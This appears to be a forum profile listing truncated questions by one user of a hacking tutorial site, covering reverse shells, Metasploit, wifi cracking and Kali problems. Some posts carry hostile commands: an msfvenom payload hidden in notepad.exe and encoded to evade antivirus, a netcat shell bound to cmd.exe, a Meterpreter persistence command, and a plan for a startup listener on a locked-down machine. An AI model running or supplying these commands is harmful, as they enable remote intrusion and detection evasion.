I have an OpenVPN server I setup. I also have a reverse shell on a computer with the OpenVPN IP. When I run the listener on the VPN's IP (while connected to the VPN) I don't get any sessions. If I try on my local network with my local IP it works perfectly fine. Long story sh ...more
I am working on a site and I am using MySQL. I have a file that accesses the database with a password. Right now the password is just saved in plain text in the file but as you guys should know this is not secure. What is the best way of having this be secure? Or should I just ...more
I have copied notepad.exe form my Windows machine to Kali to use as a template and did this command msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.144 LPORT=4444 -x notepad.exe -e x86/shikataganai -i 2000 -f exe > evil.exe When I transfer the evil.exe to my compute ...more
How useful would people think of a wrapper for some tools in Kali. This would connect them together. Like you would generate a word list, use it with aircrack then after it gets the wifi password does an nmap scan. This is just an example and obviously it would not be fully a ...more
When I go to beef login screen I get the logo but no login screen. Anyone else seen this? Using Kali 2
When I have a Meterpreter prompt on a Linux x86 machine and I try running any script it says that it is not compatible with that version of Meterpreter. Anyone else know of this?
This week is my 4th hackathon at my college and I am excited. I heard rumors of wifi challenges and working alot with Samba and privilege escalation. Any tips for these would be appreciated. :)
I have been playing around with Wifi cracking, specifically automating it more. What is weird is that whenever I do airodump-ng or even switch the wifi card to monitor mode I loss connection and have to restart the ssh server. Does anyone know what is happening?
These are the following commands I have done. ifconfig wlan1 down iwconfig wlan1 mode monitor ifconfig wlan1 up airodump-ng wlan1 <- This does show all APs in range airodump-ng --bssid <macaddresshere> -c 4 -w filename wlan1 <- This is where my issue is aireplay-ng -3 -a <BS ...more
So in python I have this one line self.setup.oslinuxcall("airodump-ng {}".format(adapter)) This runs airodump on said adapter. My question is how do I make it so I could just exit airodump instead of the whole script like ctrl+c would do. Thank you in advance.
I am playing around with this tutorial and if I try this command run persistence -A -L /var/ -X 30 -p 4444 -r 10.601.37 it tells me x86/linux version of Meterpreter is not supported with this Script! and if I define -P with linux/meterpreter/reversetcp it still says the same t ...more
Is there a tutorial on Null-Byte that shows how to deauth users? I looked at the WiFi tutorials here and there wasn't one specifically about deauth. Am I jut missing one?
I want to have a good discussion about what people use for their distribution to do hacking from. I personally use ZorinOS but with the hacking tools I need and Kali repos installed so I can install more. I do this because I like the interface ZorinOS comes with.
Some friends of mine and I are doing a nerd podcast thing and I was going to do a security section. Would this be something you guys would want to know about or what?
I have a netcat listener running from a script @echo off nc.exe -Ldp 4444 -e cmd.exe and the command prompt stays open. I am not great at Windows scripting so how do I force the command prompt to close after the initial running?
First off I know what a script kiddie is. It is someone who runs a hacking tool without knowing what it does or how it does it. Some people would even go as far as saying that using any tool you didn't make makes you a script kiddie. (See Mr Robot S1 EP8 I believe) I disagree ...more
Is there a way that I can configure my Windows firewall from a Linux USB? I know you can change alot this way.
I would want to use a netcat listener on a deep frozen computer and have it run on startup. I also would need it to run as an admin account and open the firewall as one since it is locked down. How do I do this WITHOUT editing the registry. I know I can boot a Linux USB to edi ...more
I am unable to upload a local picture. I was going to send a screenshot but I can't upload
I am following this tutorial here and I do the command "airmon-ng start wlan0" and it creates wlan0mon and displays "(mac80211 monitor mode cif enabled for phy0wlan0 on phy0wlan0mon) (mac80211 monitor mode cif disabled for phy0wlan0 on phy0wlan0)". After this I do the command ...more
I have a Kali USB that I made with YUMI for multiboot reasons. Whenever I boot off it for Kali I get a super loud beep, and I mean super loud. Is there a way I can disable this?
I know what encorders are and why they are there but how do they work? What I know is that they change the signature of what it is used on. How do they do so? Do they add random code and comments to change their hash? Or does it change how compiled exploits are compiled?
Anyone done much hacking on Windows 10? What are some of your experiences?
I am using this tutorial this one and I have done this before I upgraded to Windows 10. Now it isn't working. I just keep getting "Sending SiteLoader.jar. Waiting for user to click 'accept'... instead of a shell. This is after I say run and everything. If someone could try thi ...more
I have found that I am unable to send messages because I changed my email and it keeps saying to verify it but never sends me the email. Anyone else having this issue?
here and here Would anyone here be interested in watching me do some hacking practice on a site like Twitch or Beam? Just wondering, it would be nice to have someone yell at me if I do something stupid. Just let me know :)
I am thinking about doing 1 tutorial a week. Is this a good amount? I can do more if people think that would be better.
Are they doing a slow rollout to people or do I have to do something besides apt-get dist-upgrade?
I have found a zero day on a server that the local hacking league uses for most of their scenarios during competitions. It isn't huge or anything but it does help me get in and I am hoping to get it working with some MSF payload. My question is, is it ethical for me to keep th ...more
If I leave a tab open to something for a while it redirects to wonderhowto.com and this is kinda annoying. Is there a way to fix this?
Things like Heartbleed come to mind, or really any Zero day to be honest. What if I am a company who relies on product X but product X has just been found to have a bad vulnerability and it will probably take a couple days to patch. What do I do? Do I leave it vulnerable and k ...more
I love this site and use it a lot to learn new stuff but I find that if there is a series I am always digging for the next part of the article so to help combat this I am going to keep a list of tutorials that I follow and read. Feel free to contribute to this little project o ...more